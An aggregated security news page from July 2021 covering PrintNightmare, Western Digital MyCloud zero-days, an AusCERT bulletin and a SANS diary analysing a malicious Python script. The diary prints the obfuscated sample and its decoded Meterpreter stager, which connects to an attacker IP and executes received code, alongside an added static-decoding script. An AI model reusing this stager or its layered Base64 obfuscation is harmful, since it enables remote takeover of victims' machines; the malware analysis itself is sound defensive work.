Malware Devil

Friday, July 2, 2021

PrintNightmare, LinkedIn Leaks, Cyber Legislation, & Beer Bots – Wrap Up – SWN #132

This week in the Security Weekly News: The Revenge of the AI Beer Bots, NIST software definitions, Print Spooler, LinkedIn leaked out, cybersecurity legislation, and more, along with the show wrap-ups for this week!

Visit https://www.securityweekly.com/swn for all the latest episodes!

Show Notes: https://securityweekly.com/swn132

The post PrintNightmare, LinkedIn Leaks, Cyber Legislation, & Beer Bots – Wrap Up – SWN #132 appeared first on Malware Devil.



https://malwaredevil.com/2021/07/02/printnightmare-linkedin-leaks-cyber-legislation-beer-bots-wrap-up-swn-132/?utm_source=rss&utm_medium=rss&utm_campaign=printnightmare-linkedin-leaks-cyber-legislation-beer-bots-wrap-up-swn-132

TrickBot Spruces Up Its Banking Trojan Module

After focusing almost exclusively on delivering ransomware for the past year, the code changes could indicate that TrickBot is getting back into the bank-fraud game.

Widespread Brute-Force Attacks Tied to Russia’s APT28

The ongoing attacks are targeting cloud services such as Office 365 to steal passwords and password-spray a vast range of targets, including in U.S. and European governments and military.

Why Healthcare Keeps Falling Prey to Ransomware and Other Cyberattacks

Nate Warfield, CTO of Prevailion and former Microsoft security researcher, discusses the many security challenges and failings plaguing this industry.

Another 0-Day Looms for Many Western Digital Users

Some of Western Digital’s MyCloud-based data storage devices. Image: WD.

Countless Western Digital customers saw their MyBook Live network storage drives remotely wiped in the past month thanks to a bug in a product line the company stopped supporting in 2015, as well as a previously unknown zero-day flaw. But there is a similarly serious zero-day flaw present in a much broader range of newer Western Digital MyCloud network storage devices that will remain unfixed for many customers who can’t or won’t upgrade to the latest operating system.

At issue is a remote code execution flaw residing in all Western Digital network attached storage (NAS) devices running MyCloud OS 3, an operating system the company only recently stopped supporting.

Researchers Radek Domanski and Pedro Ribeiro originally planned to present their findings at the Pwn2Own hacking competition in Tokyo last year. But just days before the event Western Digital released MyCloud OS 5, which eliminated the bug they found. That update effectively nullified their chances at competing in Pwn2Own, which requires exploits to work against the latest firmware or software supported by the targeted device.

Nevertheless, in February 2021 the duo published a detailed YouTube video documenting how they discovered a chain of weaknesses that allows an attacker to remotely update a vulnerable device’s firmware with a malicious backdoor, using a low-privileged user account that has a blank password.

The researchers said Western Digital never responded to their reports. In a statement provided to KrebsOnSecurity, Western Digital said it received their report after Pwn2Own Tokyo 2020, but that at the time the vulnerability they reported had already been fixed by the release of My Cloud OS 5.

“The communication that came our way confirmed the research team involved planned to release details of the vulnerability and asked us to contact them with any questions,” Western Digital said. “We didn’t have any questions so we didn’t respond. Since then, we have updated our process and respond to every report in order to avoid any miscommunication like this again. We take reports from the security research community very seriously and conduct investigations as soon as we receive them.”

Western Digital ignored questions about whether the flaw found by Domanski and Ribeiro was ever addressed in OS 3. A statement published on its support site March 12, 2021 says the company will no longer provide further security updates to the MyCloud OS 3 firmware.

“We strongly encourage moving to the My Cloud OS5 firmware,” the statement reads. “If your device is not eligible for upgrade to My Cloud OS 5, we recommend that you upgrade to one of our other My Cloud offerings that support My Cloud OS 5. More information can be found here.” A list of MyCloud devices that can support OS 5 is here.

But according to Domanski, OS 5 is a complete rewrite of Western Digital’s core operating system, and as a result some of the more popular features and functionality built into OS3 are missing.

“It broke a lot of functionality,” Domanski said of OS 5. “So some users might not decide to migrate to OS 5.”

In recognition of this, the researchers have developed and released their own patch that fixes the vulnerabilities they found in OS 3 (the patch needs to be reapplied each time the device is rebooted). Western Digital said it is aware of third parties offering security patches for My Cloud OS 3.

“We have not evaluated any such patches and we are unable to provide any support for such patches,” the company stated.

A snippet from the video showing the researchers uploading their malicious firmware via a remote zero-day flaw in MyCloud OS 3.

Domanski said MyCloud users on OS 3 can virtually eliminate the threat from this attack by simply ensuring that the devices are not set up to be reachable remotely over the Internet. MyCloud devices make it super easy for customers to access their data remotely, but doing so also exposes them to attacks like last month’s that led to the mass-wipe of MyBook Live devices.

“Luckily for many users they don’t expose the interface to the Internet,” he said. “But looking at the number of posts on Western Digital’s support page related to OS3, I can assume the userbase is still considerable. It almost feels like Western Digital without any notice jumped to OS5, leaving all the users without support.”

Dan Goodin at Ars Technica has a fascinating deep dive on the other zero-day flaw that led to the mass attack last month on MyBook Live devices that Western Digital stopped supporting in 2015. In response to Goodin’s report, Western Digital acknowledged that the flaw was enabled by a Western Digital developer who removed code that required a valid user password before allowing factory resets to proceed.

Facing a backlash of angry customers, Western Digital also pledged to provide data recovery services to affected customers starting this month. “MyBook Live customers will also be eligible for a trade-in program so they can upgrade to MyCloud devices,” Goodin wrote. “A spokeswoman said the data recovery service will be free of charge.”

If attackers get around to exploiting this OS 3 bug, Western Digital might soon be paying for data recovery services and trade-ins for a whole lot more customers.


Barracuda Networks Acquires SKOUT Cybersecurity

Barracuda Networks this week extended the scope of its cybersecurity portfolio by agreeing to acquire SKOUT Cybersecurity. SKOUT’s security operations center (SOC) service and extended detection and response (XDR) software is primarily made available via managed service providers (MSPs). Terms of the acquisition were not disclosed. Neal Bradbury, vice president of MSP strategic partnerships at..


🔴 LIVE: Security Weekly News #132

This week, Dr. Doug talks: The Revenge of the AI Beer Bots, NIST software definitions, Print Spooler, LinkedIn leaked out, cybersecurity legislation, and of course the show wrap-ups for this week!

→Full Show Notes: https://securityweekly.com/swn132

→Join the Security Weekly Discord Server: https://discord.gg/pqSwWm4
→Visit our website: https://www.securityweekly.com
→Follow us on Twitter: https://www.twitter.com/securityweekly


F Secure Total: Test vs Malware and ID Protection

F Secure Total Evaluation: Malware & Ransomware Test, ID Protection overview. How does this product stack up?

👉 Contact us for business:
https://thepcsecuritychannel.com/contact

👉 Buy the best antivirus, security products with exclusive discounts and support this channel:
https://thepcsecuritychannel.com/buy/

👉 Join our community on Discord:
http://discord.tpsc.tech/

👉 Don’t forget to like and subscribe for the latest cybersecurity content:
https://www.youtube.com/c/thepcsecuritychannel?sub_confirmation=1


One Medical: Sorry-not-Sorry for Leaking your Personal Info

Primary care med-tech firm One Medical sent email to countless customers, with hundreds of other customer email addresses visible in the To: field.


LinkedIn Breach, Bitcoin From Banks, PrintNightmare, & NFC Flaws in ATMs – PSW #701

This week in the Security News: LinkedIn breach exposes user data, Why MTTR is Bad for SecOps, 3 Things Every CISO Wishes You Understood, USA as a Cyber Power, is ignorance bliss for hackers, flaws let you hack an ATM by waving your phone, PrintNightmare, Bitcoins from Banks and more!
Visit https://www.securityweekly.com/psw for all the latest episodes!
Show Notes: https://securityweekly.com/psw701


ISC Stormcast For Friday, July 2nd, 2021 https://isc.sans.edu/podcastdetail.html?id=7568, (Fri, Jul 2nd)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.


Network Security News Summary for Saturday July 3rd, 2021

Special Podcast: Print Spooler Vulnerability (CVE-2021-34527, CVE-2021-1675) Update/Summary #printnightmare

Print Spooler printnightmare Update
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
https://doublepulsar.com/zero-day-for-every-supported-windows-os-version-in-the-wild-printnightmare-b3fdb82f840c
https://blog.truesec.com/2021/06/30/fix-for-printnightmare-cve-2021-1675-exploit-to-keep-your-print-servers-running-while-a-patch-is-not-available/
https://github.com/LaresLLC/CVE-2021-1675

keywords: cve-2021-34527, CVE-2021-1675, print spooler, printnightmare


US email hacker gets his “computer trespass” conviction reversed

Court says that we need to “avoid a construction that makes some language mere surplusage.”

CISA Offers New Mitigation for PrintNightmare Bug

CERT urges administrators to disable the Windows Print Spooler service on domain controllers and on systems that don’t print, while Microsoft attempts to clarify the RCE flaw with a new CVE assignment.

Safer Kids Online – How we can help schools and teachers

Check out all the ways our initiative assists teachers and educational institutions in keeping students safe online, including our special Digital Security Handbook for Teachers, which you can download here
https://backend.saferkidsonline.eset.com/storage/free-downloads/April2021/Digital-Security-Handbook-for-Teachers.pdf


Reducing the Risk of Credential Leakage

Long-term cloud credentials are often scattered throughout source code, on laptops or desktops, on servers, in cloud resources and in other locations. It’s easy to copy them across machines, creating credential sprawl that increases your leakage risk. It’s unnecessary, too, because these types of credentials are only required when non-cloud infrastructure resources need to communicate..


Can Your Data Protection Software Recover from Modern Ransomware?

Your nightmare has come true. Your organization was just attacked by ransomware. They have crippled your networks, corrupted your Active Directory, encrypted business critical documents, and disabled production databases. Now the recovery clock starts. How quickly can your business return to some sense of normalcy? Do you notify your partners, vendors, customers, the public? Do..


Privacy Takes a Hit In the High Court

One of the earliest “privacy” laws in the United States is, surprisingly, the Fair Credit Reporting Act. Back during the Nixon Administration, Congress passed a law that gave people the right to see what was on their credit report, to contest inaccuracies on their reports and to ensure that the information on their credit report..


“inception.py”… Multiple Base64 Encodings, (Fri, Jul 2nd)

“Inception” is a very nice SF movie in which, if you have not seen it, dreams are planted in people’s minds to extract sensitive information from their memories. Then a dream is planted inside another dream, and so on, up to five levels[1]! If you are not paying attention to the movie, you can quickly get lost.

Yesterday, I spotted an interesting malicious Python script. It has a very low VT score (3/58)[2] and is very small:

import base64;exec(base64.b64decode(bytes('aW1wb3J0IGJhc2U2NDtleGVjKGJhc2U2NC5iNjRkZWNvZGUoYnl0ZXMoJ2FXMXdiM0owSUdKaGMy
VTJORHRsZUdWaktHSmhjMlUyTkM1aU5qUmtaV052WkdVb1lubDBaWE1vSjFwWWFHeFplV2htV0RKc2RHTkhPWGxrUmpsbVMwTmthVmxZVG14T2Fs
RnVTMU0xYVU1cVVtdGFWMDUyV2tkVmIxZ3hPWEJpV0VKMlkyNVNabGg1WjI1Wk1qbHJXbGRPZWtwNWEzVmFNbFl3V2xjMWFtSXlVbXhqYVdkdVpG
aFNiVXhVWjI1TFUyZHVXVlpqZUdReVNYcFRha0pLVTBVMU1sZFVTakJpUjFKRVpVUmFhVkl5ZUhCVVJXUkxZVWROZVZaVVNrOVJNMmcyV2tWb1Mw
MVdhM3BWV0U1clVqSjRNRmRzUm5kaVYwbDZVMWRrYkZFd1NuZFpiV3hEWlZac1dFNVhOV0ZWTW1RMFZGVk9jazVyVG01aVJFSnFZbTF6TWxFeVpI
SlRiVTQyVFZod2FVMXJOWGxYYkdoU1pGZE5lVTlYY0doTmJGbDNVekJTU21NeVRYbFBWM0JvVFd4WmQxUkhlRTlWUmtWM1pFZGFWazFXU2xSVmJG
WkhWR3QwVW1Jd2NFUlhSVEV4VjFSSk5XUlhTblJXYlhCclVUSmtkbE51Y0ZabFZYaHhVbFJDVFdGclZUQlVSM0JHWlZVNVZGa3pUazVXUlZWNFZH
NXdhbU5GZEZKaU1IQkVWakJ3TlZkc1pFZGphMDV1WWtkNGJGSXdOWE5aTUdoU1RtdE9ibUV3Y0d0U01uZ3dWMnhOTVdWdFNraFdiWGhxVVRKamVG
TXhSbmRqTVVKWlZHcENhbUpzV25GYVJVMHhUVmRLZFZGdGFGcE5iazUyVTI1dk1WTnJjRFZsU0hCTlltdHdjMWRVVGxwaU1EVkVZVE5DV0dWclNt
dFJNakZTVDFkT05VNVliR0ZXTURSNVV6QmtNMk5GVG5WYVJ6bG9Wak5vYzFOVlpEUmlSMHB3WVVkMFRGWklhSHBVTW1SMlUyeHdSR042YkdwbFZG
WTFWMnhrVDAxcmRFaGtNMUpwVWpGYU1WTXdaRkpqUlhSU1kwZDRiRkl4V25GVE1HaDNZekpHV0ZOWVZtRlNNVnB4V1dwSmVHUXlUblJXYm5CcVpW
ZG9jRmRXYUU5aVJUVnhWVmhXV21Gc2EzZFhhMlJYWVcxSmVWVnRlRXhTTVVaM1V6Rk9ORTR3YjNwVVZ6VlFZbXMwTlZNeFJuWlFVMk53VjNwQ1pF
dFRhejBuTENkVlZFWXRPQ2NwS1M1a1pXTnZaR1VvS1NrPScsJ1VURi04JykpLmRlY29kZSgpKQ==','UTF-8')).decode())

When you see this, your reflex is to decode the Base64-encoded data. Probably a simple script, let’s have a look at it:

remnux@remnux:/MalwareZoo/20210702$ base64dump.py inception.py
ID  Size    Encoded           Decoded           md5 decoded
--  ----    -------           -------           -----------
 1:    4    exec              {..               dfaf38dfe495302d62c3a9cefd4dc593
 2: 1384    aW1wb3J0IGJhc2U2  import base64;ex  953edd11c0c0f82534e750ebb8e4dad3
remnux@remnux:/MalwareZoo/20210702$ base64dump.py inception.py -s 2 -d
import base64;exec(base64.b64decode(bytes('aW1wb3J0IGJhc2U2NDtleGVjKGJhc2U2NC5iNjRkZWNvZGUoYnl0ZXMoJ1pYaGxZeWhmWDJsdGNH
OXlkRjlmS0NkaVlYTmxOalFuS1M1aU5qUmtaV052WkdVb1gxOXBiWEJ2Y25SZlh5Z25ZMjlrWldOekp5a3VaMlYwWlc1amIyUmxjaWduZFhSbUxU
Z25LU2duWVZjeGQySXpTakJKU0U1MldUSjBiR1JEZURaaVIyeHBURWRLYUdNeVZUSk9RM2g2WkVoS01Wa3pVWE5rUjJ4MFdsRndiV0l6U1dkbFEw
SndZbWxDZVZsWE5XNWFVMmQ0VFVOck5rTm5iREJqYm1zMlEyZHJTbU42TVhwaU1rNXlXbGhSZFdNeU9XcGhNbFl3UzBSSmMyTXlPV3BoTWxZd1RH
eE9VRkV3ZEdaVk1WSlRVbFZHVGt0UmIwcERXRTExV1RJNWRXSnRWbXBrUTJkdlNucFZlVXhxUlRCTWFrVTBUR3BGZVU5VFkzTk5WRVV4VG5wamNF
dFJiMHBEVjBwNVdsZEdja05uYkd4bFIwNXNZMGhSTmtObmEwcGtSMngwV2xNMWVtSkhWbXhqUTJjeFMxRndjMUJZVGpCamJsWnFaRU0xTVdKdVFt
aFpNbk52U25vMVNrcDVlSHBNYmtwc1dUTlpiMDVEYTNCWGVrSmtRMjFST1dONU5YbGFWMDR5UzBkM2NFTnVaRzloVjNoc1NVZDRiR0pwYUd0TFZI
aHpUMmR2U2xwRGN6bGplVFY1V2xkT01rdEhkM1JpUjFaMVMwZFJjRXRSY0d4bFIxWnFTMGh3YzJGWFNYVmFSMVpxWWpJeGQyTnRWbnBqZVdocFdW
aE9iRTVxVVhWWmFsa3dXa2RXYW1JeVVteExSMUZ3UzFONE4wb3pUVzVQYms0NVMxRnZQU2NwV3pCZEtTaz0nLCdVVEYtOCcpKS5kZWNvZGUoKSk=
','UTF-8')).decode())

Another Base64 chunk of data? Let’s do it again. Finally, the payload was encoded four times! (Thanks to base64dump.py for working smoothly with pipes!)

remnux@remnux:/MalwareZoo/20210702$ base64dump.py inception.py -s 2 -d |
base64dump.py -s 2 -d |
base64dump.py -s 2 -d |
base64dump.py -s 2 -d
import socket,zlib,base64,struct,time
for x in range(10):
    try:
        s=socket.socket(2,socket.SOCK_STREAM)
        s.connect(('52[.]14[.]18[.]129',11577))
        break
    except:
        time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
    d+=s.recv(l-len(d))
exec(zlib.decompress(base64.b64decode(d)),{'s':s})

Basically, what we have is this:

remnux@remnux:/MalwareZoo/20210702$ echo "Hello" | base64 | base64 | base64 | base64 -d | base64 -d | base64 -d
Hello
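The same peeling can be done statically, without ever calling exec(), which is how an analyst would recover the innermost stager for inspection. This is an added example, not code from the diary or from base64dump.py; it matches the one-line wrapper shape shown above and uses a constructed sample (a harmless print wrapped four times, the depth found for inception.py), with the Base64 line-wrapped to mimic how the sample was rendered.

```python
import base64
import re

# One layer of the inception.py wrapper, as shown in the diary:
#   import base64;exec(base64.b64decode(bytes('<base64>','UTF-8')).decode())
# Whitespace inside the Base64 is tolerated because the captured sample was
# line-wrapped at 76 columns; nothing matched here is ever executed.
WRAPPER_RE = re.compile(
    r"""^\s*import\s+base64\s*;\s*exec\(\s*base64\.b64decode\(\s*bytes\(\s*
        ['"](?P<b64>[A-Za-z0-9+/=\s]+)['"]\s*,\s*['"]UTF-8['"]\s*\)   # bytes(...)
        \s*\)\s*\.decode\(\s*\)\s*\)\s*$""",
    re.VERBOSE,
)


def wrap_once(script: str) -> str:
    """Build one exec(b64decode(...)) layer around `script`.
    Used only to construct the sample below; the Base64 is line-wrapped at
    76 columns to mimic how the blog rendered the real sample."""
    b64 = base64.b64encode(script.encode("utf-8")).decode("ascii")
    b64 = "\n".join(b64[i:i + 76] for i in range(0, len(b64), 76))
    return "import base64;exec(base64.b64decode(bytes('%s','UTF-8')).decode())" % b64


def peel_layers(script: str, max_layers: int = 32):
    """Statically unwrap nested wrapper layers.
    Returns (innermost_script, layer_count). Each layer is matched against
    WRAPPER_RE and Base64-decoded; exec() is never called, so the innermost
    payload (the socket stager in the diary) can be read safely."""
    current, layers = script, 0
    while layers < max_layers:
        m = WRAPPER_RE.match(current)
        if not m:
            break
        b64 = re.sub(r"\s+", "", m.group("b64"))  # undo line wrapping
        try:
            decoded = base64.b64decode(b64, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            break  # malformed layer: stop and return what was recovered so far
        current, layers = decoded, layers + 1
    return current, layers


# Constructed sample (not the real payload): a harmless one-liner wrapped
# four times, the same depth the diary found for inception.py.
SAMPLE_INNER = "print('innermost layer reached')"


def build_sample(depth: int = 4) -> str:
    script = SAMPLE_INNER
    for _ in range(depth):
        script = wrap_once(script)
    return script


if __name__ == "__main__":
    payload, depth = peel_layers(build_sample())
    print("layers peeled:", depth)
    print("innermost payload:", payload)
```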

The decoded script is a slightly modified Meterpreter backdoor and the IP address is alive. I connected to it in a sandbox and expected to get some payload but nothing…

Simple technique but it remains very effective to bypass antivirus solutions!

[1] https://visual.ly/community/Infographics/entertainment/5-levels-inception
[2] https://www.virustotal.com/gui/file/5bbde2e0191fac97ecceb6daf05780ae794966cfa0eeeeeda57541e33205a133/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More


ASB-2021.0123 – ALERT [Win] Microsoft Print Spooler: Multiple vulnerabilities


===========================================================================
AUSCERT Security Bulletin

ASB-2021.0123
Windows Print Spooler Remote Code Execution Vulnerability
2 July 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product:          Microsoft Print Spooler
Operating System: Windows
Impact/Access:    Administrator Compromise        -- Existing Account
                  Execute Arbitrary Code/Commands -- Existing Account
Resolution:       Mitigation
CVE Names:        CVE-2021-34527 CVE-2021-1675
Reference:        ASB-2021.0116
                  ASB-2021.0115

Comment: Vulnerability popularly referred to as PrintNightmare.
         POC exploit code has reportedly been released.

OVERVIEW

Microsoft has released an out-of-band critical update to address a
Windows Print Spooler Remote Code Execution Vulnerability.
Microsoft has assigned CVE-2021-34527 to this vulnerability and
acknowledges it has been referred to publicly as PrintNightmare.[1]

This vulnerability has received significant media attention in the past day.
[2] [3] [4] [5]

IMPACT

Microsoft has stated the following:

“Microsoft is aware of and investigating a remote code execution
vulnerability that affects Windows Print Spooler and has assigned
CVE-2021-34527 to this vulnerability. This is an evolving situation
and we will update the CVE as more information is available.

A remote code execution vulnerability exists when the Windows Print
Spooler service improperly performs privileged file operations.
An attacker who successfully exploited this vulnerability could run
arbitrary code with SYSTEM privileges. An attacker could then install
programs; view, change, or delete data; or create new accounts with
full user rights.

An attack must involve an authenticated user calling RpcAddPrinterDriverEx().”
[1]

MITIGATION

Microsoft recommends applying the latest security updates released on June 8
AND determining if the Print Spooler service is running and either disabling it
or disabling inbound remote printing through Group Policy. [1]

Microsoft acknowledges this vulnerability is similar to but distinct from the
recent Print Spooler vulnerability reported as CVE-2021-1675 and addressed by
the June 2021 security updates, and that they are still investigating the issue
and will update the page as more information becomes available. [1]

REFERENCES

[1] Windows Print Spooler Remote Code Execution Vulnerability
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

[2] ‘PrintNightmare’ Stuxnet-style zero-day
https://www.itnews.com.au/news/researchers-accidentally-publish-printnightmare-stuxnet-style-zero-day-566767

[3] Public Windows PrintNightmare 0-day exploit allows domain takeover
https://www.bleepingcomputer.com/news/security/public-windows-printnightmare-0-day-exploit-allows-domain-takeover/

[4] Researchers accidentally release exploit code for new Windows
‘zero-day’ bug PrintNightmare
https://portswigger.net/daily-swig/researchers-accidentally-release-exploit-code-for-new-windows-zero-day-bug-printnightmare

[5] PrintNightmare, Critical Windows Print Spooler Vulnerability
https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability

AusCERT has made every effort to ensure that the information contained
in this document is accurate. However, the decision to use the information
described is the responsibility of each user or organisation. The decision to
follow or act on information or advice contained in this security bulletin is
the responsibility of each user or organisation, and should be considered in
accordance with your organisation’s site policies and procedures. AusCERT
takes no responsibility for consequences which may arise from following or
acting on information or advice contained in this security bulletin.

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================


Barbary Pirates and Russian Cybercrime

In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...